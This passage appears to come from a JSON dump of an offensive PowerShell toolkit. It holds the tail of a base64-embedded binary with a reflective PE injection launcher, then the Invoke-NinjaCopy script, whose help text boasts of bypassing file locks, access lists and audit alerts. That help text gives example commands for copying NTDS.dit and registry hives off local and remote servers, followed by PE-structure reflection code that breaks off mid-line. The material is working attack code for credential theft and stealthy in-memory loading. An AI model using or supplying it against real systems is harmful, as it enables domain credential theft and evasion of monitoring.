IDwkPCg8LDwwPDQ8ODw8PEA8TDxQPFQ8WDxcPGA8ZDxoPGw8hDyIPJQ8oDykPLA8vDzAPMg80DzYPNw84DzoPOw8+Dz8PAg9DD0YPRw9ID0oPSw9MD04PTw9QD1IPUw9WD1cPWg9bD14PXw9iD2MPZg9nD2oPaw9uD28Pcg9zD3YPdw94D3oPew98D34Pfw9AD4EPhA+ID4kPig+LD4wPjQ+OD48PkA+RD5IPkw+UD5UPlg+XD5gPmQ+aD5sPnA+dD54Pnw+gD6EPog+jD6QPpQ+mD6cPug+7D4cPyA/JD8oPyw/MD/gPwAAAPAHAPACAAAYMEAwRDBIMEwwUDBUMFgwXDBgMGQwaDBsMHAwdDB4MHwwgDCEMIgwjDCQMJgwnDCkMKgwrDCwMLQwuDDYMOAw5DDoMOww8DD0MAAxDDEQMRQxGDEcMSAxJDEoMSwxMDE0MTgxPDFAMUQxSDFMMVAxWDFcMWQxaDFwMXQxeDF8MYAxhDGIMYwxkDGUMZgxpDGwMbQxuDG8McAxxDHIMcwx0DHUMdgx3DHgMeQx6DHsMfAx9DH4MfwxADIEMggyDDIQMhQyGDIcMiAyLDI4MjwyQDJEMkgyTDJQMlQyWDJcMmAyZDJoMmwycDJ0MngyfDKAMoQyiDKMMpAynDKoMqwysDK0MrgyvDLAMsQyyDLMMtAy1DLYMtwy4DLkMugy7DLwMvQy+DL8MgAzBDMIMwwzGDMkMygzLDMwMzQzODM8M0AzTDNYM1wzYDNkM2gzbDNwM3QzeDN8M4AzhDOIM4wzkDOUM5gznDOgM6QzqDOsM7AztDO4M7wzwDPEM8gzzDPQM9Qz2DPgM/Az9DP4M/wzADQENAg0DDQQNBQ0GDQcNCA0JDQoNCw0MDQ0NDg0PDRANEw0WDRcNGA0ZDRoNGw0cDR0NHg0fDSANIQ0iDSMNJA0lDSYNJw0oDSkNKg0tDTANMQ0yDTMNNA03DToNOw08DT0NPg0/DQQNSg1QDVYNVw1cDV0NYg1jDWgNag1rDW4Nbw1wDXENcg1zDXkNeg19DUgNiQ2KDYsNjA2NDY4Njw2QDZENkg2TDZQNlQ2WDZcNmA2ZDZoNmw2cDZ0Nng2fDaANoQ2iDaMNpA2lDaYNpw2oDakNqg2rDawNrQ2uDa8NsA2xDbINsw20DbUNtg23DbgNuQ26DbsNvA29Db4Nvw2ADcENwg3DDcQNxQ3GDccNyA3JDcoNyw3MDc0Nzg3PDdAN0Q3SDdMN1A3VDdYN1w3YDdkN2g3bDd0N3g3fDe0OLg4CDnwPPQ8+Dz8PMQ9zD3QPeQ96D0AMAoAiAAAAPwwCDGkM6gztDO4M8QzyDPUM9gz5DPoM/Qz+DMENAg0FDQYNDg0WDR0NHg0lDSYNLg02DT4NAQ1IDVANWA1aDVsNYg1qDXENcg16DUINig2SDZoNog2qDbINug2CDcoN0g3aDeIN6g3yDfoNwg4KDhIOGg4iDioOMQ4yDjkOOg4AGAKAMwBAAAAMTAxQDFQMWAxcDGIMZQxmDGcMbgxvDH4MRg3KDcsNzA3NDc4Nzw3QDdEN0g3TDdYN1w3YDdkN2g3bDdwN3Q3+Df8N2A5aDlsOXA5dDmIOYw5kDmUOZg5nDmgOaQ5qDmwOcQ5zDnUOdw58Dn0Ofw5CDoUOhg6IDokOiw6MDo4Ojw6RDpIOlA6VDpcOmA6aDpsOnQ6gDqMOpA6mDqcOqQ6qDqwOrw6wDrIOsw61DrYOuA65DrsOvA6+Dr8OgQ7CDsQOxQ7HDsgOyg7LDs0O0A7RDtMO1A7WDtcO2Q7aDtwO3Q7fDuAO4g7jDuUO5g7oDukO6w7sDu4O7w7xDvIO9A71DvcO+A76DvsO/Q7+DsAPAw8GDwcPCQ8KDwwPDQ8PDxAPEg8TDxUPFg8YDxkPGw8cDx4PHw8hDyIPJA8lDycPKA8qDysPLQ8uDzAPMQ8zDzQPNg85DzoPPA89Dz8PAg9FD0gPSw9OD1EPVA9VD1cPWA9aD1sPXQ9gD2EPYw9mD2kPag9xD7MPtQ+4D7oPvA+/D4EPww/KD8wPzQ/OD88P1A/VD9YP1w/YD9kP2g/bD98P4Q/mD+gP7Q/vD/QP9g/7D/0PwBwCgB4AQAACDAQMCQwLDBAMEgwXDBkMHgwgDCcMLAwtDC4MMww1DDwMAQxCDEMMSAxKDE8MUQxWDFgMXQxfDGQMZgxrDG0Mcgx0DHkMewxADIIMhwyJDI4MkAyVDJcMnAyeDKMMpQyqDKwMsQyzDLgMugy/DIEMxgzIDM0MzwzUDNYM2wzdDOIM5AzpDOsM8AzyDPcM+Az5DP4M/wzADQUNBg0HDQwNDQ0ODRMNFA0VDRoNGw0cDSENIg0jDSYNKA0qDS0NLw0xDTQNNg04DT8NBg1LDU0NTw1QDVENUg1TDVQNVg1qDXkNSA2qDawNuQ27DYgNyg3XDdkN5g3oDfYN+A3FDgcOFA4WDjoOPA4JDksOWA5aDmcOaQ52DngORQ6HDpQOlg6lDqoOrA64DrwOvg6CDsQO0Q7TDuAO4g7vDvEO/g7ADwwPDg8QDyoPLA8+Dw0PXA9rD34PTQ+cD7QPuQ++D4IPxA/RD9MP4A/iD+8P8Q/AAAAgAoApAAAAFgwYDCUMJww0DDYMAwxFDF4MbQx8DEsMmQyaDKYMtQyGDNUM5AzzDMINEQ0eDSENPg0NDVwNaw16DUkNlg2XDZkNpg21DYQN1A3XDd8N4g3uDf0NzA4bDioOOQ4IDlcOaA5pDmsOdQ52DngOQg6PDpAOkg6eDqsOrA6uDroOiQ7YDucO9g73DvkOxg8VDyQPMw8CD1UPVg9YD0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA='\n\n\tif ($ComputerName -eq $null -or $ComputerName -imatch \"^\\s*$\")\n\t{\n\t\tInvoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes64, $PEBytes32, \"Void\", 0, \"\", $ExeArgs)\n\t}\n\telse\n\t{\n\t\tInvoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes64, $PEBytes32, \"Void\", 0, \"\", $ExeArgs) -ComputerName $ComputerName\n\t}\n}\n\nMain\n}\n"
  },
  {
    "path": "Exfiltration/Invoke-NinjaCopy.ps1",
    "content": "function Invoke-NinjaCopy\n{\n<#\n.SYNOPSIS\n\nThis script can copy files off an NTFS volume by opening a read handle to the entire volume (such as c:) and parsing the NTFS structures. This requires you\nare an administrator of the server. This allows you to bypass the following protections:\n    1. Files which are opened by a process and cannot be opened by other processes, such as the NTDS.dit file or SYSTEM registry hives\n    2. SACL flag set on a file to alert when the file is opened (I'm not using a Win32 API to open the file, so Windows has no clue)\n    3. Bypass DACL's, such as a DACL which only allows SYSTEM to open a file\n\nIf the LocalDestination param is specified, the file will be copied to the file path specified on the local server (the server the script is being run from).\nIf the RemoteDestination param is specified, the file will be copied to the file path specified on the remote server.\n\nThe script works by opening a read handle to the volume (which if logged, may stand out, but I don't think most people log this and other processes do it too).\nThe script then uses NTFS parsing code written by cyb70289 and posted to CodePlex to parse the NTFS structures. Since the NTFS parsing code is written\nin C++, I have compiled the code to a DLL and load it reflective in to PowerShell using the Invoke-ReflectivePEInjection.ps1 script (see below for a link\nto the original script).\n\nScript: Invoke-NinjaCopy.ps1\nAuthor: Joe Bialek, Twitter: @JosephBialek\nContributors: This script has a byte array hardcoded, which contains a DLL wich parses NTFS. This NTFS parsing code was written by cyb70289 <cyb70289@gmail.com>\n\t\t\t\t\t\tSee the following link: http://www.codeproject.com/Articles/81456/An-NTFS-Parser-Lib\n\t\t\t\t\t\tThe source code is also available with the distribution of this script.\nLicense: GPLv3 or later\nRequired Dependencies: None\nOptional Dependencies: None\n\n.DESCRIPTION\n\nCopies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures. This bypasses file DACL's,\nread handle locks, and SACL's. You must be an administrator to run the script. This can be used to read SYSTEM files which are normally\nlocked, such as the NTDS.dit file or registry hives.\n\n\n.PARAMETER Path\n\nThe full path of the file to copy (example: c:\\filedir\\file.txt)\n\n.PARAMETER LocalDestination\n\nOptional, a file path to copy the file to on the local computer. If this isn't used, RemoteDestination must be specified.\n\n.PARAMETER RemoteDestination\n\nOptional, a file path to copy the file to on the remote computer. If this isn't used, LocalDestination must be specified.\n\n.PARAMETER BufferSize\n\nOptional, how many bytes to read at a time from the file. The default is 5MB.\n\nPowerShell will allocate a Byte[] equal to the size of this buffer, so setting this too high can cause PowerShell to use a LOT of RAM. It's\nyour job to figure out what \"too high\" is for your situation.\n\n.PARAMETER ComputerName\n\nOptional, an array of computernames to run the script on.\n\n\n.EXAMPLE\n\nRead the file ntds.dit from a remote server and write it to c:\\test\\ntds.dit on the local server\n$NtdsBytes = Invoke-NinjaCopy -Path \"c:\\windows\\ntds\\ntds.dit\" -ComputerName \"Server1\" -LocalDestination \"c:\\test\\ntds.dit\"\n\n.EXAMPLE\n\nRead the file ntds.dit from a remote server and copy it to the temp directory on the remote server.\nInvoke-NinjaCopy -Path \"c:\\windows\\ntds\\ntds.dit\" -RemoteDestination \"c:\\windows\\temp\\ntds.dit\" -ComputerName \"Server1\"\n\n.EXAMPLE\n\nRead the file ntds.dit from the local server and copy it to the temp directory on the local server.\nInvoke-NinjaCopy -Path \"c:\\windows\\ntds\\ntds.dit\" -LocalDestination \"c:\\windows\\temp\\ntds.dit\"\n\n\n.NOTES\nThis script combines two programs. The first is Invoke-ReflectivePEInjection, links can be found below to the original source.\nThis is a PowerShell script which can reflectively load EXE's/DLL's.\n\nThe second program is NTFS parsing code written in C++ by cyb70289 <cyb70289@gmail.com> and posted to CodeProject. I have compiled this\ncode as a DLL so it can be reflectively loaded by the PowerShell script. \nThe CodeProject code can be found here: http://www.codeproject.com/Articles/81456/An-NTFS-Parser-Lib\n\n.LINK\n\nBlog: http://clymb3r.wordpress.com/\nGithub repo: https://github.com/clymb3r/PowerShell\nNTFS Parsing Code: http://www.codeproject.com/Articles/81456/An-NTFS-Parser-Lib\n\nBlog on reflective loading: http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/\n\n#>\n\n[CmdletBinding()]\nParam(\n\t[Parameter(Position = 0, Mandatory = $true)]\n\t[String]\n\t$Path,\n\n\t[Parameter(Position = 1, ParameterSetName=\"RemoteDest\")]\n\t[String]\n\t$RemoteDestination,\n\n    [Parameter(Position = 1, ParameterSetName=\"LocalDest\")]\n    [String]\n    $LocalDestination,\n\t\n\t[Parameter(Position = 2)]\n\t[String[]]\n\t$ComputerName,\n\t\n\t[Parameter(Position = 3)]\n\t[UInt32]\n\t$BufferSize = 5 * 1024 * 1024\n)\n\nSet-StrictMode -Version 2\n\n\n$RemoteScriptBlock = {\n\t[CmdletBinding()]\n\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[String]\n\t\t$PEBytes32,\n\n        [Parameter(Position = 1, Mandatory = $true)]\n\t\t[String]\n\t\t$PEBytes64,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[String]\n\t\t$Path,\n\t\t\n\t\t[Parameter(Position = 3)]\n\t\t[String]\n\t\t$RemoteDestination,\n\t\t\n\t\t[Parameter(Position = 4)]\n\t\t[UInt32]\n\t\t$BufferSize,\n\n        [Parameter(Position = 5)]\n\t\t[UInt64]\n\t\t$FileOffset\n\t)\n\t\n\t###################################\n\t##########  Win32 Stuff  ##########\n\t###################################\n\tFunction Get-Win32Types\n\t{\n\t\t$Win32Types = New-Object System.Object\n\n\t\t#Define all the structures/enums that will be used\n\t\t#\tThis article shows you how to do this with reflection: http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html\n\t\t$Domain = [AppDomain]::CurrentDomain\n\t\t$DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')\n\t\t$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)\n\t\t$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)\n\t\t$ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]\n\n\n\t\t############    ENUM    ############\n\t\t#Enum MachineType\n\t\t$TypeBuilder = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16])\n\t\t$TypeBuilder.DefineLiteral('Native', [UInt16] 0) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null\n\t\t$MachineType = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name MachineType -Value $MachineType\n\n\t\t#Enum MagicType\n\t\t$TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16])\n\t\t$TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null\n\t\t$MagicType = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType\n\n\t\t#Enum SubSystemType\n\t\t$TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16])\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null\n\t\t$SubSystemType = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType\n\n\t\t#Enum DllCharacteristicsType\n\t\t$TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16])\n\t\t$TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null\n\t\t$TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null\n\t\t$DllCharacteristicsType = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType\n\n\t\t###########    STRUCT    ###########\n\t\t#Struct IMAGE_DATA_DIRECTORY\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8)\n\t\t($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null\n\t\t($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null\n\t\t$IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY\n\n\t\t#Struct IMAGE_FILE_HEADER\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20)\n\t\t$TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null\n\t\t$TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null\n\t\t$IMAGE_FILE_HEADER = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER\n\n\t\t#Struct IMAGE_OPTIONAL_HEADER64\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240)\n\t\t($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null\n\t\t($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null\n\t\t($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null\n\t\t($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null\n\t\t($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null\n\t\t($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null\n\t\t($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null\n\t\t($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null\n\t\t($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null\n\t\t($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null\n\t\t($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null\n\t\t($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null\n\t\t($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null\n\t\t($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null\n\t\t($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null\n\t\t($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null\n\t\t($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null\n\t\t($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null\n\t\t($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null\n\t\t($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null\n\t\t($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null\n\t\t($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null\n\t\t($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null\n\t\t($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null\n\t\t($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null\n\t\t($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null\n\t\t($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null\n\t\t($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null\n\t\t($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null\n\t\t($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null\n\t\t($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null\n\t\t($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null\n\t\t($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null\n\t\t($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null\n\t\t($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null\n\t\t($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null\n\t\t$IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType()\n\t\t$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64\n\n\t\t#Struct IMAGE_OPTIONAL_HEADER32\n\t\t$Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'\n\t\t$TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224)\n\t\t($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null\n\t\t($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null\n\t\t($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null\n\t\t($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null\n\t\t($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null\n\t\t($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null\n\t\t($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null\n\t\t($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null\n\t\t($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null\n\t\t($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null\n\t\t($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null\n\t\t($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null\n\t\t($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null\n\t\t($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null\n\t\t($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null\n\t\t($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null\n\t\t($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null\n\t\t($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null\n\t\t($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null\n\t\t($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null\n\t\t($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null\n\t\t($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null\n\t\t($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null\n\t\t($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null\n\t\t($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null\n\t\t($TypeBuilder.DefineField('ExceptionTable', 